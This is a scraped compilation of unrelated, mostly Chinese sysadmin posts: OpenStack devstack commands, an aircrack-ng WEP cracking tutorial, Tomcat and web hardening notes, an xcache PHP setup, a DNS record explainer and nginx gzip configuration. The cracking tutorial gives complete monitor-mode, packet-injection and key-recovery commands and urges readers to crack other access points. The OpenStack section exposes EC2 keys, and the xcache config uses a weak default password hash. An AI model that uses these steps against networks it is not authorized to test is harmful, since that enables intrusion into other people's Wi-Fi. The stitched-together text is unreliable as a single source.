/opt/stack/noVNC/utils/nova-wsproxy.py --flagfile /opt/stack/nova/bin/nova.conf --web . 6080 &

/opt/stack/keystone/bin/keystone --config-file=/opt/stack/keystone/etc/keystone.conf &

/opt/stack/nova/bin/nova-api &

/opt/stack/glance/bin/glance-registry --config-file=/opt/stack/glance/etc/glance-registry.conf &

/opt/stack/glance/bin/glance-api --config-file=/opt/stack/glance/etc/glance-api.conf &

/opt/stack/nova/bin/nova-network &

/opt/stack/nova/bin/nova-scheduler &


/usr/sbin/rabbitmq-server



ImportError: No module named auth_handler

I've already solved this problem by :


1. Clone Boto project to my server

    - git clone  https://github.com/boto/boto.git


2. Go to boto directory and install setup.py

    - sudo python setup.py install


Now you can run euca command without an error


sudo nova-manage db sync

sk@openstack:~$ sudo nova-manage user admin sk

2011-12-19 15:33:35,069 AUDIT nova.auth.manager [-] Created user sk (admin: True)

export EC2_ACCESS_KEY=f19994fe-ee79-44da-ad12-e0d0b41354ee

export EC2_SECRET_KEY=a28a243d-24d3-49d9-a10d-8b1fb580bb7a


glance index --host=127.0.0.1 -A zhengwei

glance -A zhengwei add name="ubuntu1010" is_public=true container_format=ami disk_format=ami < maverick-server-uec-amd64.img 

sk@openstack:/opt/stack/test$ glance add -A zhengwei name="ubuntu1010-kernel" is_public=true container_format=aki disk_format=aki < maverick-server-uec-amd64-vmlinuz-virtual    

Added new image with ID: 22da3ceb-e53d-4e0c-93f2-e11a7b9e5abc


sk@openstack:/opt/stack/test$ glance add -A zhengwei name="ubuntu1010" is_public=true container_format=ami disk_format=ami kernel_id=22da3ceb-e53d-4e0c-93f2-e11a7b9e5abc ramdisk_id=22da3ceb-e53d-4e0c-93f2-e11a7b9e5abc < maverick-server-uec-amd64.img                                                                            

Added new image with ID: 6b32cb23-2fcd-4daf-8f9a-3477d1b83284

ubuntu下轻松破解无线密码

系统ubuntu10.x

网卡：UR054G
一、安装ubuntu和aircrack-ng

1、安装Ubuntu 8.10 （ 现在最新版暂时是 Alpha 6 ）在此感谢3楼的兄弟指正
附下载地址兄弟们根据自己的硬件选择相应的版本：

ubuntu
2、打开终端：Applications->Accessories->Terminal
在终端中输入 sudo gedit /etc/apt/sources.list 删除所有内容，然后把下面的源复制进去，保存，退出

#Chinese Sources “CN99″

deb http://Ubuntu.cn99.com/ubuntu/ intrepid main restricted universe multiverse
deb http://Ubuntu.cn99.com/ubuntu/ intrepid-backports main restricted universe multiverse
deb http://Ubuntu.cn99.com/ubuntu/ intrepid-proposed main restricted universe multiverse
deb http://Ubuntu.cn99.com/ubuntu/ intrepid-security main restricted universe multiverse
deb http://Ubuntu.cn99.com/ubuntu/ intrepid-updates main restricted universe multiverse

#ubuntu’s Main Sources

deb http://archive.ubuntu.com/ubuntu/ intrepid main universe restricted multiverse
deb http://security.ubuntu.com/ubuntu/ intrepid-security universe main multiverse restricted
deb http://archive.ubuntu.com/ubuntu/ intrepid-updates universe main multiverse restricted
deb http://archive.ubuntu.com/ubuntu/ intrepid-proposed universe main multiverse restricted

3、升级ubuntu到最新版本：System->Administration->Update Manager
4、在终端中输入 sudo apt-get install aircrack-ng 安装aircrack-ng

注：如果暂时你的电脑上不了网，步聚2、3也可以不做，只需刻张Ubuntu系统碟，还有在下面下载aircrack-ng就可以了。
aircrack-ng Ubuntu DEB安装包下载：
二、破解过程

1、在终端中输入 sudo airmon-ng start wlan0 启动无线网卡的监控模式（wlan0是无线网卡的端口,可在终端中输入 ifconfig 查看）
2、在终端中输入 sudo airodump-ng mon0 （特别说明：启动监控模式后无线网的端口现在是 mon0 ！！！）看看有哪些采用wep加密的AP在线，然后按 ctrl+c 退出，保留终端
3、另开一个终端，输入 sudo airodump-ng -c 6 –bssid AP’s MAC -w wep mon0 (-c后面跟着的6是要破解的AP工作频道，–bissid后面跟着的AP’s MAC是要欲破解AP的MAC地址，-w后面跟着wep的是抓下来的数据包DATA保存的文件名，具体情况根据步骤2里面的在线AP更改频道和MAC地址，DATA保存的文件名可随便命名）抓包
4、再另开一个终端，输入 sudo aireplay-ng -1 0 -a AP的mac -h 我wifi的mac mon0 与AP建立虚拟连接 （-h后面跟着的My MAC是自己的无线网卡的MAC地址)

 
5、建立虚拟连接成功后，输入 sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP’s MAC -h My MAC mon0 进行注入，现在回头看下步骤3的终端是不是DATA在开始飞涨！
6、收集有5000个以上的DATA之后，另开一个终端，输入 sudo aircrack-ng wep*.cap 进行解密 （如果没算出来的话，继续等，aircrack-ng 会在DATA每增加多5000个之后就自动再运行，直到算出密码为至）
7、破解出密码后在终端中输入 sudo airomon-ng stop mon0 关闭监控模式，不然无线网卡会一直向刚刚的AP进行注入的，用ctrl+c退出或者直接关闭终端都是不行的。

现在可以冲浪去了，或者重复步聚1-7破解其它的AP

最近系统要上线，收到一份系统技术规范，与安全相关的。这里总结一下：

代码相关：

1.sql注入，这个大家估计都知道，用预处理解决.这个问题很简单，但是在编程时只求完成任务，很多地方都没注意，在日后编程中要认真了。

2.cookie,用户登录时将用户名与密码加密后存放在cookie中，虽然加过密但是在firebug之类的工具下用document.cookie还是可以看到密文的，需要设置httponly.在servlet3.0规范中可以设置Cookie对象的httponly属性。对于之前的版本，需要直接response.setHeader来设置cookie,在字符串最后最后加上httponly就行了(由于最后为了简单直接将cookie去掉了，代码丢失),测试中发现使用这种方法只能为一个cookie设置httponly.一般来说用户与密码会分为两个cookie对象，那么用response.setHeader要调用两次，前一次会被后面的调用override，如果只调一次，将username与password都加上去，测试时发现不能成功。

3.flash安全配置，只允许信任网站的请求

4.尽管不使用第三方链接形式的js,iframe防止xss

tomcat相关：

一.tomcat默认的管理界面及doc信息要禁用

1.取消tomcat默认主页，禁止管理及文档页面的访问(解决可直接查看文件列表的目录、URL存在内部IP地址泄露、URL存在电子邮件地址模式、部分的无效链接、系统路径信息泄露）

a)tomcat/conf/server.xml

找到

<Host name=”localhost” appBase=”webapps”

unpackWARs=”true” autoDeploy=”true”

xmlValidation=”false” xmlNamespaceAware=”false”>

在后面添加<Context path=”” docBase=”smartspeed” debug=”0″ reloadable=”true” />,将smartspeed设为tomcat默认主页,可以直接ip:port访问主页

b)删除tomcat/webapps下面的ROOT及tomcat-docs目录

tomcat/webapps/ROOT

tomcat/webapps/tomcat-docs

禁止管理页面与文档页面的使用

2.禁用不安全的HTTP方法(禁用掉PUT/DELETE/HEAD/OPTIONS/TRACE)

在tomcat/conf/web.xml的结束标签</webapp>之前加入

<security-constraint>

<web-resource-collection>

<url-pattern>/*</url-pattern>

<http-method>PUT</http-method>

<http-method>DELETE</http-method>

<http-method>HEAD</http-method>

<http-method>OPTIONS</http-method>

<http-method>TRACE</http-method>

</web-resource-collection>

<auth-constraint></auth-constraint>

</security-constraint>

<login-config>

<auth-method>BASIC</auth-method>

</login-config>

3.将项目中未使用到的链接全部删除(不要小看这个，安全评估过不了的)

最近1vps服务器php比较消耗cpu，导致负载有点升高。加上xcache过后效果非常不错。

1. wget http://xcache.lighttpd.net/pub/Releases/1.3.2/xcache-1.3.2.tar.gz
2.tar xx.tar.gz
3.cd xx && xxx/bin/phpize && ./configure –enable-xcache –with-php-config=/opt/php5/bin/php-config
4.php.ini装载xcache模块

xcache.admin.enable_auth = On

xcache.admin.user = "admin"

; xcache.admin.pass = md5($your_password)

xcache.admin.pass = "21232f297a57a5a743894a0e4a801fc3"

xcache.shm_scheme = "mmap"

xcache.size = 64M

xcache.count = 8

xcache.slots = 8K

xcache.ttl = 0

xcache.gc_interval = 0

xcache.var_size = 16M

xcache.var_count = 1

xcache.var_slots = 8K

xcache.var_ttl = 0

xcache.var_maxttl = 0

xcache.var_gc_interval = 300

xcache.test = Off

xcache.readonly_protection = Off

xcache.mmap_path = "/dev/zero"

xcache.coredump_directory = ""

xcache.cacher = On

xcache.stat = On

xcache.optimizer = Off

xcache.coverager = Off

xcache.coveragedump_directory = ""

降低cpu负载效果非常不错！

DNS分为正向查找区域和反向查找区域，然后在分为，主要，辅助，存根区域，在这些区域里，又存在着很多的记录，今天，就让我们来看看这些记录：

1.A记录
A记录也称为主机记录，是使用最广泛的DNS记录，A记录的基本作用就是说明一个域名对应的IP是多少，   它是域名和IP地址的对应关系，表现形式为     www.contoso.com   192.168.1.1  这就是一个A记录！A记录除了进行域名IP对应以外，还有一个高级用法，可以作为低成本的负载均衡的解决方案，比如说，www.contoso.com  可以创建多个A记录，对应多台物理服务器的IP地址，可以实现基本的流量均衡
2.NS记录
NS记录和SOA记录是任何一个DNS区域都不可或缺的两条记录，NS记录也叫名称服务器记录，用于说明这个区域有哪些DNS服务器负责解析，SOA记录说明负责解析的DNS服务器中哪一个是主服务器。因此，任何一个DNS区域都不可能缺少这两条记录。NS记录，说明了在这个区域里，有多少个服务器来承担解析的任务，
3.SOA记录
NS记录说明了有多台服务器在进行解析，但哪一个才是主服务器呢，NS并没有说明，这个就要看SOA记录了，SOA名叫起始授权机构记录，SOA记录说明了在众多NS记录里那一台才是主要的服务器
4.MX记录
全称是邮件交换记录，在使用邮件服务器的时候，MX记录是无可或缺的，比如A用户向B用户发送一封邮件，那么他需要向ＤＮＳ查询Ｂ的MX记录，DNS在定位到了B的MX记录后反馈给A用户，然后Ａ用户把邮件投递到B用户的ＭＸ记录服务器里！
５.Cname记录
又叫别名记录，我们可以这么理解，我们小的时候都会有一个小名，长大了都是学名，那么正规来说学名的符合公安系统的，那个小名只是我们的一个代名词而已，这也存在一个好处，就是比暴漏自己，比如一个网站a.com 在发布的时候，他可以建立一个别名记录，把B.com发不出去，这样不容易被外在用户所察觉！达到隐藏自己的目的！
6.SRV记录
SRV记录是服务器资源记录的缩写，SRV记录是DNS记录中的新鲜面孔，在RFC2052中才对SRV记录进行了定义，因此很多老版本的DNS服务器并不支持SRV记录。那么SRV记录有什么用呢？SRV记录的作用是说明一个服务器能够提供什么样的服务！SRV记录在微软的Active Directory中有着重要地位，大家知道在NT4时代域和DNS并没有太多关系。但从Win2000开始，域就离不开DNS的帮助了，为什么呢？因为域内的计算机要依赖DNS的SRV记录来定位域控制器！表现形式为：
—ldap._tcp.contoso.com 600 IN SRV 0 100 389 NS.contoso.com
ladp: 是一个服务，该标识说明把这台服务器当做响应LDAP请求的服务器
tcp：本服务使用的协议，可以是tcp，也可以是用户数据包协议《udp》
contoso.com：此记录所值的域名
600： 此记录默认生存时间（秒）
IN： 标准DNS Internet类
SRV：将这条记录标识为SRV记录
0:优先级，如果相同的服务有多条SRV记录，用户会尝试先连接优先级最低的记录
100：负载平衡机制，多条SRV并且优先级也相同，那么用户会先尝试连接权重高的记录
389：此服务使用的端口
NS.contoso.com:提供此服务的主机
7.PTR记录
PTR记录也被称为指针记录，PTR记录是A记录的逆向记录，作用是把IP地址解析为域名。由于我们在前面提到过，DNS的反向区域负责从IP到域名的解析，因此如果要创建PTR记录，必须在反向区域中创建。

nginx gzip静态传送

nginx有两种gzip方式，一种是动态，一种是静态方式。
1.动态方式就是，客户端请求的时候服务器才压缩传送
2.静态方式是服务器端提前使用gzip手工压缩js成xx.js.gz传送压缩包到客户端。客户端根据Content-Encoding    gzip头进行解压
动态配置是：
gzip_static on;
gzip  on;
gzip_min_length 1000;
gzip_proxied any;
gzip_types       text/plain application/x-javascript text/css;
gzip_proxied expired no-cache no-store private auth;
静态配置是：
增加 mime.types
application/x-javascript              js js.gz;
然后增加nginx配置
location ~ .*\.(js.gz)?$
{
root     /home/www;
add_header Content-Encoding gzip;
gzip off;
}

nginx要修改两处，在虚拟主机配置段中添加：

location ~* ^.+.gzjs$ {
add_header Content-Encoding gzip;
gzip off;
}
上面还要增加root目录，否则直接404
另外再修改nginx的mime文件，在application/x-javascript js;中添加gzjs

application/x-javascript js gzjs;